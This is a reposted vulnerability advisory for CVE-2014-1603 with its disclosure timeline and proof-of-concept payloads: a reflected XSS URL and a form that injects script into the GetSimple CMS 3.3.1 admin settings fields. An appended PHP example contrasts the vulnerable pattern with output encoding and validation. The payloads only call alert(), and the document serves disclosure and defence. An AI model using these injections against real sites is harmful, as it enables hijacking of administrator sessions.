Found some persistent and reflected cross-site scripting in the Admin
console of GetSimple CMS 3.3.1 and below.
Waited 6 months for a fix but the developer stopped answering my
emails, so decided to release this anyway.
PoC for XSS bugs in the admin console of GetSimple CMS 3.3.1
CVE-2014-1603
by Pedro Ribeiro (pedrib@gmail.com) from Agile Information Security
Timeline:
04/11/2013 - Found bugs, produced proof of concept.
05/11/2013 - Communicated to the developer, who acknowledged receipt.
10/01/2014 - Politely asked the developer for progress, no response.
17/01/2014 - Received CVE number from MITRE.
20/01/2014 - Communicated CVE number to the developer, no response.
29/01/2014 - Politely asked the developer for progress, no response.
12/05/2014 - Public release.
==============================
Reflected XSS in plugin load page:
http://192.168.56.101/getsimple/admin/load.php?id=anonymous_data&param="><script>alert(1)</script>
Persistent XSS in settings page:
<form name="input" action="http://192.168.56.101/getsimple/admin/settings.php" method="post">
<input type="text" name="user" value=""><script>alert(1);</script>">
<input type="text" name="email" value=""><script>alert(2);</script>">
<input type="text" name="name" value=""><script>alert(3);</script>">
<input type="hidden" name="submitted" value="Save Settings">
<input type="submit" value="Submit">
</form>
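
Added example, not part of the original advisory and not GetSimple CMS source code: the attribute-breakout pattern both PoCs rely on, next to output encoding for the HTML attribute context and input validation of the settings fields. The function names and the allowed user-name character set are assumptions made for illustration; the sample input is constructed from the field names and payload shape shown above.

```php
<?php
// Added example: hypothetical helper names, not GetSimple CMS source code.

// Vulnerable pattern: the stored value is concatenated into a double-quoted
// attribute, so a value beginning with "> closes the attribute and the tag.
function render_field_unsafe(string $name, string $value): string
{
    return '<input type="text" name="' . $name . '" value="' . $value . '">';
}

// Hardened pattern: encode for the HTML attribute context at output time.
// ENT_QUOTES encodes both quote styles; the charset is set explicitly.
function attr(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

function render_field_safe(string $name, string $value): string
{
    return '<input type="text" name="' . attr($name) . '" value="' . attr($value) . '">';
}

// Second layer: reject values that cannot be a legitimate e-mail address or
// user name before they are stored. The user-name pattern is an assumption.
function validate_settings(array $post): array
{
    $errors = [];
    if (filter_var($post['email'] ?? '', FILTER_VALIDATE_EMAIL) === false) {
        $errors[] = 'email';
    }
    if (!preg_match('/\A[A-Za-z0-9_.-]{1,64}\z/', $post['user'] ?? '')) {
        $errors[] = 'user';
    }
    return $errors;
}

// Constructed sample input using the field names and payload shape from the PoC.
$post = [
    'user'  => '"><script>alert(1);</script>',
    'email' => '"><script>alert(2);</script>',
    'name'  => '"><script>alert(3);</script>',
];

echo render_field_unsafe('name', $post['name']), PHP_EOL; // markup escapes value=""
echo render_field_safe('name', $post['name']), PHP_EOL;   // payload stays inside value=""
echo 'rejected fields: ', implode(', ', validate_settings($post)), PHP_EOL;
```

Encoding at output is the fix for both the reflected and the persistent case; the validation step only narrows what can be stored and does not replace it.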
source link: https://raw.githubusercontent.com/pedrib/PoC/master/getsimplecms-3.3.1.txt
//The information contained within this publication is
//supplied "as-is" with no warranties or guarantees of fitness
//of use or otherwise. Bot24, Inc nor Bradley Sean Susser accepts
//responsibility for any damage caused by the use or misuse of
//this information